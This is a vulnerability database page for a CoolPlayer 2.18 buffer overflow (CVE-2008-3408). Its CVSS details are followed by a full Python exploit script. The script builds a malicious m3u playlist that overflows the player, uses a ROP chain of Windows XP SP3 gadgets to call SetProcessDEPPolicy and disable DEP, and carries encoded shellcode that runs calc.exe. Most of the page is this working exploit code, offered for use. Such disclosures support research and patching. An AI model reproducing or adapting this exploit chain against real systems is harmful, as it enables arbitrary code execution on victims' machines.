CoolPlayer 2.18 DEP Bypass

2011.01.04
Credit: Blake
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2008-3408
CWE: CWE-119


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: CoolPlayer 2.18 DEP Bypass # Date: January 2, 2011 # Author: Blake # Version: 2.18 # Tested on: Windows XP SP3 running in Virtualbox # Uses SetProcessDEPPolicy() to disable DEP for the process # Thanks to mr_me for the encouragement # Exploit-DB Notes: May not work on all Win XP SP3 machines print "\n============================" print "CoolPlayer 2.18 DEP Bypass" print "Written by Blake" print "============================\n" # windows/exec calc.exe 227 bytes - 240 bytes of shellcode space available shellcode =( "\xda\xda\xd9\x74\x24\xf4\xbf\xe7\x18\x22\xfb\x2b\xc9\xb1\x33" "\x5e\x31\x7e\x17\x83\xee\xfc\x03\x99\x0b\xc0\x0e\x99\xc4\x8d" "\xf1\x61\x15\xee\x78\x84\x24\x3c\x1e\xcd\x15\xf0\x54\x83\x95" "\x7b\x38\x37\x2d\x09\x95\x38\x86\xa4\xc3\x77\x17\x09\xcc\xdb" "\xdb\x0b\xb0\x21\x08\xec\x89\xea\x5d\xed\xce\x16\xad\xbf\x87" "\x5d\x1c\x50\xa3\x23\x9d\x51\x63\x28\x9d\x29\x06\xee\x6a\x80" "\x09\x3e\xc2\x9f\x42\xa6\x68\xc7\x72\xd7\xbd\x1b\x4e\x9e\xca" "\xe8\x24\x21\x1b\x21\xc4\x10\x63\xee\xfb\x9d\x6e\xee\x3c\x19" "\x91\x85\x36\x5a\x2c\x9e\x8c\x21\xea\x2b\x11\x81\x79\x8b\xf1" "\x30\xad\x4a\x71\x3e\x1a\x18\xdd\x22\x9d\xcd\x55\x5e\x16\xf0" "\xb9\xd7\x6c\xd7\x1d\xbc\x37\x76\x07\x18\x99\x87\x57\xc4\x46" "\x22\x13\xe6\x93\x54\x7e\x6c\x65\xd4\x04\xc9\x65\xe6\x06\x79" "\x0e\xd7\x8d\x16\x49\xe8\x47\x53\xab\x19\x5a\x49\x3c\x80\x0f" "\x30\x20\x33\xfa\x76\x5d\xb0\x0f\x06\x9a\xa8\x65\x03\xe6\x6e" "\x95\x79\x77\x1b\x99\x2e\x78\x0e\xfa\xb1\xea\xd2\xd3\x54\x8b" "\x71\x2c") buffer = "\x41" * 220 eip = "\x28\xb0\x9f\x7c" # POP ECX / RETN - SHELL32.DLL 7C9FB028 offset1 = "\x42" * 4 nop = "\x90" * 10 # put zero in EBX rop = "\xdd\xad\x9e\x7c" # POP EBX / RETN - SHELL32.DLL 7C9EADDD rop += "\xff\xff\xff\xff" # placed into ebx rop += "\xe1\x27\xc1\x77" # INC EBX / RETN - MSVCRT.DLL 77C127E1 # set EBP to point to SetProcessDEPPolicy rop += "\x7b\xa6\x9e\x7c" # POP EBP / RETN - SHELL32.DLL 7C9EA67B rop += "\xa4\x22\x86\x7c" # address of SetProcessDEPPolicy XP SP3 # set EDI as a pointer to RET (rop nop) rop += "\x47\xeb\x9e\x7c" # POP EDI / RETN - SHELL32.DLL 7C9EEB47 rop += "\x08\x15\x9c\x7c" # RETN - SHELL32.DLL 7C9C1508 # set ESI as a pointer to RET (rop nop) rop += "\x4c\x20\x9c\x7c" # POP ESI / RETN - SHELL32.DLL 7C9C204C rop += "\x51\x20\x9c\x7c" # RETN - SHELL32.DLL 7C9C2051 # set ESP to point at nops rop += "\x73\x10\xa1\x7c" # PUSHAD / RETN - SHELL32.DLL 7CA11073 print "[*] Creating malicious m3u file" try: file = open("exploit.m3u","w") file.write(buffer + eip + offset1 + rop + nop + shellcode) file.close() print "[*] File created" except: print "[x] Error creating file!" raw_input("\nPress any key to exit...")

References:

http://xforce.iss.net/xforce/xfdb/44103
http://www.securityfocus.com/bid/30418
http://www.milw0rm.com/exploits/6157
http://www.frsirt.com/english/advisories/2008/2264/references
http://securityreason.com/securityalert/4088
http://secunia.com/advisories/31294


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top